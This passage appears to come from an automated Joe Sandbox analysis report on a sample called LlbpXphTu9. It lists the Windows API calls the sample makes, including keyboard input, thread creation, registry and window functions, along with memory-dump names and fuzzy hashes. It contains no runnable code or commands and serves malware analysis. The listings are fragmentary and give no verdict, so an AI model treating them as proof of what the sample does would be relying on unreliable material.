                                                                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
                                                                                                                                                                            • __swprintf.LIBCMT ref: 0045D3CC
                                                                                                                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                                            • String ID: %lu$HH
                                                                                                                                                                            • API String ID: 3164766367-3924996404
                                                                                                                                                                            • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                                                                                            • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                                                                                                                                                                            • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                                                                                            • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
                                                                                                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID: Msctls_Progress32
                                                                                                                                                                            • API String ID: 3850602802-3636473452
                                                                                                                                                                            • Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                                                                                                                            • Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
                                                                                                                                                                            • Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                                                                                                                            • Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 00415737
                                                                                                                                                                            • __calloc_crt.LIBCMT ref: 00415743
                                                                                                                                                                            • __getptd.LIBCMT ref: 00415750
                                                                                                                                                                            • CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
                                                                                                                                                                            • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 004157A9
                                                                                                                                                                              • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                                                                              • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269668773-0
                                                                                                                                                                            • Opcode ID: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                                                                                                                            • Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
                                                                                                                                                                            • Opcode Fuzzy Hash: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                                                                                                                            • Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                                                                                                                                                              • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1957940570-0
                                                                                                                                                                            • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                                                                                            • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                                                                                                                                                                            • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                                                                                            • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                                                                                                              • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                                                                              • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                                                                              • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                                                                                                              • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                                                                                                              • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                                                                                                            • ExitThread.KERNEL32 ref: 004156BD
                                                                                                                                                                            • __freefls@4.LIBCMT ref: 004156D9
                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4166825349-0
                                                                                                                                                                            • Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                                                                                                                            • Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
                                                                                                                                                                            • Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                                                                                                                            • Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                                                                                                                                                                            • API String ID: 2574300362-3261711971
                                                                                                                                                                            • Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                                                                                                            • Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
                                                                                                                                                                            • Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                                                                                                            • Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                                                                                                            • Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
                                                                                                                                                                            • Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                                                                                                            • Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00433724
                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00433757
                                                                                                                                                                            • GetClientRect.USER32(0000001D,?), ref: 004337AC
                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00433800
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00433814
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00433842
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3220332590-0
                                                                                                                                                                            • Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                                                                                                            • Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
                                                                                                                                                                            • Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                                                                                                            • Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1612042205-0
                                                                                                                                                                            • Opcode ID: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
                                                                                                                                                                            • Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
                                                                                                                                                                            • Opcode Fuzzy Hash: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
                                                                                                                                                                            • Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
                                                                                                                                                                            • SetKeyboardState.USER32(00000080), ref: 0044C59B
                                                                                                                                                                            • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                                                                                                                                                                            • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                                                                                                                                                                            • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                                                                                                                                                                            • SendInput.USER32 ref: 0044C6E2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2221674350-0
                                                                                                                                                                            • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                                                                                            • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                                                                                                                                                                            • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                                                                                            • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcscpy$_wcscat
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2037614760-0
                                                                                                                                                                            • Opcode ID: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                                                                                                                                                                            • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                                                                                                                                                                            • Opcode Fuzzy Hash: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                                                                                                                                                                            • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                                                                                                                                                                            APIs
                                                                                                                                                                            • BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4189319755-0
                                                                                                                                                                            • Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                                                                                                            • Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
                                                                                                                                                                            • Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                                                                                                            • Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
                                                                                                                                                                            APIs
                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                                                                                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1726766782-0
                                                                                                                                                                            • Opcode ID: d1f4c8b32701f3515452156a35d83f93081eba70680028f938022ee8972e20b1
                                                                                                                                                                            • Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
                                                                                                                                                                            • Opcode Fuzzy Hash: d1f4c8b32701f3515452156a35d83f93081eba70680028f938022ee8972e20b1
                                                                                                                                                                            • Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
                                                                                                                                                                            APIs
                                                                                                                                                                            • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
                                                                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 0044111A
                                                                                                                                                                            • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
                                                                                                                                                                            • ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 004411B3
                                                                                                                                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
                                                                                                                                                                            Memory Dump Source
